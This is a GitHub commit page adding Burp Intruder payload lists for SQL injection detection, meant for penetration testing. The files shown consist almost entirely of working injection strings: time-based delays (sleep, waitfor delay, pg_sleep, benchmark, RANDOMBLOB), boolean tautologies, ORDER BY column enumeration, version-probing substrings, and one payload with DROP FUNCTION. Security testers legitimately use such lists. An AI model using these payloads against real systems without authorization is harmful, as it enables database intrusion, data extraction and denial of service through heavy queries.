Skip to content

Commit b46bb66

Browse files
author
İsmail Taşdelen
committed
Intruder Payloads
Add Intruder Payloads
1 parent 40f1a6e commit b46bb66

23 files changed

+1559
-0
lines changed

Intruder/detect/GenericBlind.txt

+31
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,31 @@
1+
sleep(__TIME__)#
2+
1 or sleep(__TIME__)#
3+
" or sleep(__TIME__)#
4+
' or sleep(__TIME__)#
5+
" or sleep(__TIME__)="
6+
' or sleep(__TIME__)='
7+
1) or sleep(__TIME__)#
8+
") or sleep(__TIME__)="
9+
') or sleep(__TIME__)='
10+
1)) or sleep(__TIME__)#
11+
")) or sleep(__TIME__)="
12+
')) or sleep(__TIME__)='
13+
;waitfor delay '0:0:__TIME__'--
14+
);waitfor delay '0:0:__TIME__'--
15+
';waitfor delay '0:0:__TIME__'--
16+
";waitfor delay '0:0:__TIME__'--
17+
');waitfor delay '0:0:__TIME__'--
18+
");waitfor delay '0:0:__TIME__'--
19+
));waitfor delay '0:0:__TIME__'--
20+
'));waitfor delay '0:0:__TIME__'--
21+
"));waitfor delay '0:0:__TIME__'--
22+
benchmark(10000000,MD5(1))#
23+
1 or benchmark(10000000,MD5(1))#
24+
" or benchmark(10000000,MD5(1))#
25+
' or benchmark(10000000,MD5(1))#
26+
1) or benchmark(10000000,MD5(1))#
27+
") or benchmark(10000000,MD5(1))#
28+
') or benchmark(10000000,MD5(1))#
29+
1)) or benchmark(10000000,MD5(1))#
30+
")) or benchmark(10000000,MD5(1))#
31+
')) or benchmark(10000000,MD5(1))#
+154
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,154 @@
1+
OR 1=1
2+
OR 1=0
3+
OR x=x
4+
OR x=y
5+
OR 1=1#
6+
OR 1=0#
7+
OR x=x#
8+
OR x=y#
9+
OR 1=1--
10+
OR 1=0--
11+
OR x=x--
12+
OR x=y--
13+
OR 3409=3409 AND ('pytW' LIKE 'pytW
14+
OR 3409=3409 AND ('pytW' LIKE 'pytY
15+
HAVING 1=1
16+
HAVING 1=0
17+
HAVING 1=1#
18+
HAVING 1=0#
19+
HAVING 1=1--
20+
HAVING 1=0--
21+
AND 1=1
22+
AND 1=0
23+
AND 1=1--
24+
AND 1=0--
25+
AND 1=1#
26+
AND 1=0#
27+
AND 1=1 AND '%'='
28+
AND 1=0 AND '%'='
29+
AND 1083=1083 AND (1427=1427
30+
AND 7506=9091 AND (5913=5913
31+
AND 1083=1083 AND ('1427=1427
32+
AND 7506=9091 AND ('5913=5913
33+
AND 7300=7300 AND 'pKlZ'='pKlZ
34+
AND 7300=7300 AND 'pKlZ'='pKlY
35+
AND 7300=7300 AND ('pKlZ'='pKlZ
36+
AND 7300=7300 AND ('pKlZ'='pKlY
37+
AS INJECTX WHERE 1=1 AND 1=1
38+
AS INJECTX WHERE 1=1 AND 1=0
39+
AS INJECTX WHERE 1=1 AND 1=1#
40+
AS INJECTX WHERE 1=1 AND 1=0#
41+
AS INJECTX WHERE 1=1 AND 1=1--
42+
AS INJECTX WHERE 1=1 AND 1=0--
43+
WHERE 1=1 AND 1=1
44+
WHERE 1=1 AND 1=0
45+
WHERE 1=1 AND 1=1#
46+
WHERE 1=1 AND 1=0#
47+
WHERE 1=1 AND 1=1--
48+
WHERE 1=1 AND 1=0--
49+
ORDER BY 1--
50+
ORDER BY 2--
51+
ORDER BY 3--
52+
ORDER BY 4--
53+
ORDER BY 5--
54+
ORDER BY 6--
55+
ORDER BY 7--
56+
ORDER BY 8--
57+
ORDER BY 9--
58+
ORDER BY 10--
59+
ORDER BY 11--
60+
ORDER BY 12--
61+
ORDER BY 13--
62+
ORDER BY 14--
63+
ORDER BY 15--
64+
ORDER BY 16--
65+
ORDER BY 17--
66+
ORDER BY 18--
67+
ORDER BY 19--
68+
ORDER BY 20--
69+
ORDER BY 21--
70+
ORDER BY 22--
71+
ORDER BY 23--
72+
ORDER BY 24--
73+
ORDER BY 25--
74+
ORDER BY 26--
75+
ORDER BY 27--
76+
ORDER BY 28--
77+
ORDER BY 29--
78+
ORDER BY 30--
79+
ORDER BY 31337--
80+
ORDER BY 1#
81+
ORDER BY 2#
82+
ORDER BY 3#
83+
ORDER BY 4#
84+
ORDER BY 5#
85+
ORDER BY 6#
86+
ORDER BY 7#
87+
ORDER BY 8#
88+
ORDER BY 9#
89+
ORDER BY 10#
90+
ORDER BY 11#
91+
ORDER BY 12#
92+
ORDER BY 13#
93+
ORDER BY 14#
94+
ORDER BY 15#
95+
ORDER BY 16#
96+
ORDER BY 17#
97+
ORDER BY 18#
98+
ORDER BY 19#
99+
ORDER BY 20#
100+
ORDER BY 21#
101+
ORDER BY 22#
102+
ORDER BY 23#
103+
ORDER BY 24#
104+
ORDER BY 25#
105+
ORDER BY 26#
106+
ORDER BY 27#
107+
ORDER BY 28#
108+
ORDER BY 29#
109+
ORDER BY 30#
110+
ORDER BY 31337#
111+
ORDER BY 1
112+
ORDER BY 2
113+
ORDER BY 3
114+
ORDER BY 4
115+
ORDER BY 5
116+
ORDER BY 6
117+
ORDER BY 7
118+
ORDER BY 8
119+
ORDER BY 9
120+
ORDER BY 10
121+
ORDER BY 11
122+
ORDER BY 12
123+
ORDER BY 13
124+
ORDER BY 14
125+
ORDER BY 15
126+
ORDER BY 16
127+
ORDER BY 17
128+
ORDER BY 18
129+
ORDER BY 19
130+
ORDER BY 20
131+
ORDER BY 21
132+
ORDER BY 22
133+
ORDER BY 23
134+
ORDER BY 24
135+
ORDER BY 25
136+
ORDER BY 26
137+
ORDER BY 27
138+
ORDER BY 28
139+
ORDER BY 29
140+
ORDER BY 30
141+
ORDER BY 31337
142+
RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
143+
RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
144+
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
145+
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
146+
%' AND 8310=8310 AND '%'='
147+
%' AND 8310=8311 AND '%'='
148+
and (select substring(@@version,1,1))='X'
149+
and (select substring(@@version,1,1))='M'
150+
and (select substring(@@version,2,1))='i'
151+
and (select substring(@@version,2,1))='y'
152+
and (select substring(@@version,3,1))='c'
153+
and (select substring(@@version,3,1))='S'
154+
and (select substring(@@version,3,1))='X'

Intruder/detect/Generic_SQLI.txt

+1
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+

Intruder/detect/Generic_TimeBased.txt

+95
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,95 @@
1+
# from wapiti
2+
sleep(5)#
3+
1 or sleep(5)#
4+
" or sleep(5)#
5+
' or sleep(5)#
6+
" or sleep(5)="
7+
' or sleep(5)='
8+
1) or sleep(5)#
9+
") or sleep(5)="
10+
') or sleep(5)='
11+
1)) or sleep(5)#
12+
")) or sleep(5)="
13+
')) or sleep(5)='
14+
;waitfor delay '0:0:5'--
15+
);waitfor delay '0:0:5'--
16+
';waitfor delay '0:0:5'--
17+
";waitfor delay '0:0:5'--
18+
');waitfor delay '0:0:5'--
19+
");waitfor delay '0:0:5'--
20+
));waitfor delay '0:0:5'--
21+
'));waitfor delay '0:0:5'--
22+
"));waitfor delay '0:0:5'--
23+
benchmark(10000000,MD5(1))#
24+
1 or benchmark(10000000,MD5(1))#
25+
" or benchmark(10000000,MD5(1))#
26+
' or benchmark(10000000,MD5(1))#
27+
1) or benchmark(10000000,MD5(1))#
28+
") or benchmark(10000000,MD5(1))#
29+
') or benchmark(10000000,MD5(1))#
30+
1)) or benchmark(10000000,MD5(1))#
31+
")) or benchmark(10000000,MD5(1))#
32+
')) or benchmark(10000000,MD5(1))#
33+
pg_sleep(5)--
34+
1 or pg_sleep(5)--
35+
" or pg_sleep(5)--
36+
' or pg_sleep(5)--
37+
1) or pg_sleep(5)--
38+
") or pg_sleep(5)--
39+
') or pg_sleep(5)--
40+
1)) or pg_sleep(5)--
41+
")) or pg_sleep(5)--
42+
')) or pg_sleep(5)--
43+
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
44+
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
45+
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
46+
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
47+
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
48+
SLEEP(5)#
49+
SLEEP(5)--
50+
SLEEP(5)="
51+
SLEEP(5)='
52+
or SLEEP(5)
53+
or SLEEP(5)#
54+
or SLEEP(5)--
55+
or SLEEP(5)="
56+
or SLEEP(5)='
57+
waitfor delay '00:00:05'
58+
waitfor delay '00:00:05'--
59+
waitfor delay '00:00:05'#
60+
benchmark(50000000,MD5(1))
61+
benchmark(50000000,MD5(1))--
62+
benchmark(50000000,MD5(1))#
63+
or benchmark(50000000,MD5(1))
64+
or benchmark(50000000,MD5(1))--
65+
or benchmark(50000000,MD5(1))#
66+
pg_SLEEP(5)
67+
pg_SLEEP(5)--
68+
pg_SLEEP(5)#
69+
or pg_SLEEP(5)
70+
or pg_SLEEP(5)--
71+
or pg_SLEEP(5)#
72+
'\"
73+
AnD SLEEP(5)
74+
AnD SLEEP(5)--
75+
AnD SLEEP(5)#
76+
&&SLEEP(5)
77+
&&SLEEP(5)--
78+
&&SLEEP(5)#
79+
' AnD SLEEP(5) ANd '1
80+
'&&SLEEP(5)&&'1
81+
ORDER BY SLEEP(5)
82+
ORDER BY SLEEP(5)--
83+
ORDER BY SLEEP(5)#
84+
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
85+
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
86+
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
87+
+benchmark(3200,SHA1(1))+'
88+
+ SLEEP(10) + '
89+
RANDOMBLOB(500000000/2)
90+
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
91+
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
92+
RANDOMBLOB(1000000000/2)
93+
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
94+
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
95+
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/

0 commit comments

Comments
 (0)